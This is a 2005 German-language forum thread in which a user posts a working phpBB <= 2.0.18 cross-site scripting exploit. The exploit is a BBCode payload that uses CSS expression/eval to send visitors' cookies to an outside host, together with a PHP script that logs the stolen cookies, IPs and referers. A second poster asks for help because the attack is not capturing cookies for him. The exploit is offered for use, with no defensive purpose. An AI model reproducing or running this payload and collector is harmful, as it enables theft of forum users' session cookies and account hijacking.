phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit

rezzer · 25. Dezember 2005

huhu^^
Da hab ich doch noch was...

Aba wie immer kein support zur Anwendung oder Kompilrung von mir!

/******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
-- 'the html is on exploit'

original exploit by: Maksymilian Arciemowicz (cXIb8O3) - 12/16/2005
-- http://securityreason.com/securityalert/269/
proof of concept by: jet
-- http://jet.carbon-4.net/

develop a pure, lucid mind, not
depending upon sound, flavor,
touch, odor, or any quality.
- the diamond sutra

******************************************************************/

phpbb code:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>

c.php:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

mfg

rezzer

Anzeige

toschk · 30. Dezember 2005

Code:

http://www.url.com/cookie/c.php?c='+document.cookie

Hab halt diesen Code als link gemacht. Ich krieg ne ip und so weiter, aber keine Cookies. Da steht statt den Cookies immer:

Code:

+document.cookie

Woran kann das liegen, das ich keine cookies bekomme?

Nützliche Suchen

phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit

Videos zum Themenbereich